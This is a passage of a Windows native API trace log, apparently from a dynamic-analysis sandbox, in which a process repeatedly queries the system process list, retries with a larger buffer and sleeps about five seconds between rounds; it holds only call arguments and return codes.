ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.085] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.092] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.119] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.125] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.133] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.146] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.154] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.162] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.169] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.202] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.210] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.218] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.227] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.236] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.243] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.250] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.258] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 